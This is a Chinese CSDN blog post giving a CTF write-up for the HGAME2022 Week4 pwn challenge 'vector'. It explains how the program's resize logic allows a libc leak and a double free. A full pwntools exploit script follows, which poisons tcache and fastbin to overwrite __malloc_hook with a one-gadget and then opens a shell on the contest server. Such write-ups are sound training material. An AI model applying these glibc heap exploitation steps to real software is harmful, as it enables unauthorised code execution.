PWN-COMPETITION-HGAME2022-Week4

最新推荐文章于 2024-04-14 02:22:25 发布
最新推荐文章于 2024-04-14 02:22:25 发布
阅读量394 收藏
点赞数
分类专栏: Pwn-Competition 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/122909158
版权

PWN-COMPETITION-HGAME2022-Week4

vector

c++写的pwn,实现了vector,没有edit功能,新增了move功能
add或move时,如果输入的下标大于vector的size,vector会进行resize扩容
旧vector占用的chunk自动被free掉进入相应的bin,数据转移到新vector中
利用add时的vector扩容,free掉size大于0x410的chunk,使其进入unsorted bin,泄露libc
利用move时的vector扩容,可以造成新vector中有两个元素指向同一chunk,于是可以double free

# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
#context.log_level="debug"
is_remote=1
#io=process("./vector")
io=remote("chuj.top",53180)
elf=ELF("./vector")
libc=ELF("./libc.so.6")

#gdb.attach(io)
#pause()

io.recvuntil("sha256(????) == ")
code=io.recvuntil("\n")[:-1]
charset = string.printable
proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code, charset, 4, method='fixed')
io.sendlineafter("????> ",proof)

def add(index,size,content):
	io.sendlineafter(">> ","1")
	io.sendlineafter("ndex?\n>> ",str(index))
	io.sendlineafter("size?\n>> ",str(size))# 0~0x100
	io.sendafter("content?\n>> ",content)
def show(index):
	io.sendlineafter(">> ","3")
	io.sendlineafter("ndex?\n>> ",str(index))
def free(index):
	io.sendlineafter(">> ","4")
	io.sendlineafter("ndex?\n>> ",str(index))
def move(index,index_move_to):
	io.sendlineafter(">> ","5")
	for i in range(index):
		io.sendlineafter("[1/0]\n>> ","0")
	io.sendlineafter("[1/0]\n>> ","1")
	if is_remote:	
		io.sendlineafter("copy to?\n>> ",str(index_move_to))
	else:
		io.sendlineafter("move to?\n>> ",str(index_move_to))

#pause()

add(0,0x18,"a"*8)

#pause()

add(130,0x18,"b"*8)

#pause()

#vector扩容,原来的vector会进入unsorted bin
#这里会从unsorted bin中切割一块0x20大小的chunk
#不输入,fd和bk均指向一个相对于main_arena偏移固定的地址
add(132,0,"")#

#pause()

#泄露libc
show(132)
libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x1EBFD0
print("libc_base=="+hex(libc_base))
__malloc_hook=libc_base+libc.sym["__malloc_hook"]
print("__malloc_hook=="+hex(__malloc_hook))
realloc=libc_base+libc.sym["realloc"]
print("realloc=="+hex(realloc))
__free_hook=libc_base+libc.sym["__free_hook"]
print("__free_hook=="+hex(__free_hook))
oggs=[0xe6c7e,0xe6c81,0xe6c84]
ogg=libc_base+oggs[0]
print("ogg=="+hex(ogg))

#pause()

#用完unsorted bin
for i in range(1,5):
	add(i,0x100-8,"d"*8)

#pause()

#7个0x70大小的chunk,free后进入tcache
for i in range(5,12):
	add(i,0x68,"e"*8)

#pause()

#2个0x70大小的chunk,free后进入fastbin
add(12,0x68,"f"*8)
add(13,0x68,"g"*8)

#pause()

#这里会让vector[12]和vector[262]指向同一个chunk,可用于double free
move(12,262)

#pause()

#填满0x70大小的chunk
for i in range(5,12):
	free(i)

#pause()

#double free的第一次free
free(12)

#pause()

#glibc 2.31,利用fastbin attack绕过double free检测
free(13)

#pause()

#double free的第二次free
free(262)

#pause()

#将tcache中0x70大小的chunk用完
for i in range(5,12):
	add(i,0x68,"e"*8)

#pause()

#从fastbin中取出一个0x70大小的chunk,覆盖其fd为__realloc_hook
#取出后,stash会把fastbin链表中的chunk全部放入tcache中
print("__malloc_hook=="+hex(__malloc_hook))
add(14,0x68,p64(__malloc_hook-0x8))

#pause()

#取出tcache中的两个0x70大小的chunk
add(15,0x68,"P1umH0")
add(16,0x68,"P1umH0")

#pause()

#这次malloc会将__realloc_hook覆写为ogg,__malloc_hook覆写为realloc真实地址
print("ogg=="+hex(ogg))
add(17,0x68,p64(ogg)+p64(realloc))

#pause()

#getshell
io.sendlineafter(">> ","1")
io.sendlineafter("ndex?\n>> ",str(18))
io.sendlineafter("size?\n>> ",str(0))

io.sendline("cat flag")

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[CTF]-PWN C++文件更换libc方法(WSL),2024年最新做了6年的网络安全
weixin_58163367的博客
04-15 287
64位(约ubuntu18):patchelf --replace-needed libc.so.6 /root/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so babyheap。64位(约ubuntu18):patchelf --set-interpreter /root/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so babyheap。#这里记得根据你的容器改一下。
pwnlib:基于C ++的二进制文件分析和CTF pwn利用代码生成框架
02-20
Pwnlib 基于C ++的二进制文件分析和CTF pwn利用代码生成框架。玩得开心! 简介 基于Linux平台下的C ++ 11标准,为CTF pwn中的堆利用堆生成过渡生成一个快速利用脚本。 该程序仍在开发中,目前包含Half_Auto_Mod和Auto_Mod这两种模式。 前者需要用户为菜单填写相应的输入,并在完整的菜单功能结束后,输入完成以帮助程序确定结束一个周期,然后输入退出以完成整个程序。 上面是这两种模式的用法演示和一个简单的教程。 运行截图 教程 使用自动模式进行分析 准备好测试程序(test / test) 自动化分析 生成脚本展示(自动模式精准度还有欠缺,可以选择手动模式) 使用手动模式进行分析 如何打造项目 编译主程式 需要在main.cc中编写相关代码,快速自定义一个pwn解题脚本。 make 编译演示 1.Debug版自动分析(快速但精确度因题而异) make
2021 bytectf pwn bytezoom
yongbaoii的博客
10-21 866
保护显然是全开的。 是一道C++pwn题,c++pwn分析起来十分复杂,关于堆中chunk的各种分配、释放也非常的麻烦,因为各种对象,各种结构体都会涉及到chunk的申请释放。 我们一点一点分析 首先是功能1,create 因为分两个部分,分别是cat dog,但是里面的内容是一样的,我们就以dog为例就好。 其中我们要注意的首先是string这个结构体。 它的规则是首先申请一个chunk内容为0x10大小的chunk,也就是chunk大小是0x20. 如果我们的输入放不下,就释放这个chunk,.
pwn刷题num22----栈溢出(c++
tbsqigongzi的博客
04-25 1242
BUUCTF-PWN-pwn1_sctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 主函数调用一个vuln()函数 和平常不一样,这次是c++代码 首先让我们输入一个字符串,发现函数fgets,但是该函数只读取0x20个字节,而s有0
buuctf pwn (inndy_rop)(cmcc_simplerop)([ZJCTF 2019]Login)
cainiao78777的博客
04-18 230
由于buuctf好多pwn题目都是一个类型的,所以就把不同的,学到东西的题目,记录一下。
buuctf-pwn write-ups (11)
CoLin的pwn小屋
03-06 525
buuctf write-ups
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
【CTF pwn】Windows下尝试栈溢出执行任意函数
hans774882968的博客
02-18 3953
buu-ciscn_2019_n_1是一道可以通过栈溢出修改变量为所需值的入门pwn。这题有两个解法,我受到这题的启发,搞一个Windows版本的小实验。 目标:执行函数func。 环境:Windows10,编译出的exe是32位的;小端存储。 编译命令:g++ 1.cpp -g -o 1.exe,g++版本: Thread model: win32 gcc version 8.2.0 (MinGW.org GCC-8.2.0-5) 作者:hans774882968以及hans774882968 文章目录
一道堆方向的pwn(double free & unsorted bins)
F_Day_的博客
10-17 794
一道堆方向的pwn(double free & unsorted bins)做题环境什么是double free 在某博客上看到了一道堆的题,博主说是入门的,嗯,那正好适合我,于是我花了一周终于出结果了。。。。。。 来看看我都遇到了什么问题 做题环境 Ubuntu 20.04.3 LTS,这是我在微软商店下载的子系统,也是一切万恶之源的开始 题目:Roc826 什么是double free 希望再次之前,你已经知道什么是堆了。 double free就是对一个堆free两次 在堆中,free后堆
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 381
buuctf-pwn 001-016题wp
[CTF]-PWN C++文件更换libc方法(WSL),面试题附答案
最新发布
qd520_1314的博客
04-14 752
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
pwn】2021 金华市 和美杯
woodwhale的博客
10-14 3395
pwn】金华市 和美杯 前言 太拉了,签到都不会 堆溢出给200分真的合理吗 1、sign_in 没有edit,判断是否free有一个flag,1可以free,0不可以,free没有置0,考虑uaf,场上没想出来,题目还是做少了。没给libc,通过测试vps上的double free判断是glibc 2.23 #!/usr/bin/python3 # -*- coding: UTF-8 -*- # ----------------------------------- # @File : exp.
攻击C++的虚函数
PwnGuo的博客
09-17 989
例题为:0day安全:软件漏洞分析技术(第二版) 虚函数入口地址被统一存在虚表中,对象使用虚函数时通过调用虚表指针找到虚表,然后从虚表中取出最终的函数入口地址进行掉用,虚表指针保存在内存空间中,紧接着虚表指针的时其他成员变量,虚函数只有通过对象指针的引用才能显示出其动态调用特性。 虚函数实现 通过对象中的成员变量溢出修改对象中的虚表指针或修改需表中虚函数指针,程序调用虚函数时就会执行指定地...
pwn(二)
小明的小书包Ya
09-28 2207
pwn(二) 写在文章开头的话:之前一直在学习pwn入门,但是pwn一直是门槛比较高的一门学问,于是前一段时间懈怠了,接下来一段时间会一天写一个模块的writeup,如果遇到比较难的,不好理解的,我也会尽量理解好了,认为自己有比较好的理解方法的时候,才会来写出自己的一些看法和理解,可能会有两天到三天来查阅大量 文档才会有一个比较好的理解 - 荆轲刺秦王,潜心学安全 ...
CTFpwn总结 入门
热门推荐
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值